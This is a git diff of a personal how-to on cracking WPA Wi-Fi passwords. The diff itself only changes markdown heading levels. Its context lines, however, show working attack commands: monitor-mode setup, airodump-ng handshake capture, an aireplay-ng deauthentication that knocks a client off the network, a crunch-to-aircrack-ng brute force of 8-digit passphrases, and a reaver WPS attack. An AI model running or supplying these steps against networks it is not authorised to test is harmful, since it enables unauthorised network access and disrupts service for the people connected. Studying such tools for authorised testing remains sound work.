diff --git a/docs/Howtos/HowtoCrackWPA.md b/docs/Howtos/HowtoCrackWPA.md index 8b2d871..85426ae 100644 --- a/docs/Howtos/HowtoCrackWPA.md +++ b/docs/Howtos/HowtoCrackWPA.md @@ -1,4 +1,4 @@ -# Monitor mode +## Monitor mode For my RTL8188EUS: ``` @@ -6,7 +6,7 @@ ip link set wlanX down iw dev wlanX set type monitor ``` -# Scan networks +## Scan networks All channels: ``` @@ -17,7 +17,7 @@ Specific channel: airodump-ng -c 6 wlanX ``` -# Save a capture of chosen BSSID +## Save a capture of chosen BSSID ``` airodump-ng -c 6 --bssid 00:23:B1:82:08:xx -w wlanX @@ -32,15 +32,15 @@ aireplay-ng -0 1 -a 00:23:B1:82:0C:xx -c D0:37:45:2F:52:xx wlanX Then you should have an EAPOL/WPA handshake. -# Crack WPA passphrase +## Crack WPA passphrase -## For a 8 digits scheme +### For a 8 digits scheme ``` crunch 8 8 0123456789 -s 00000000 | aircrack-ng -w - -b 00:23:B1:82:08:xx .cap ``` -# Wireshark +## Wireshark PSK Generator: @@ -64,4 +64,4 @@ reaver -i wlanX -b 00:23:B1:82:84:xx - \ No newline at end of file +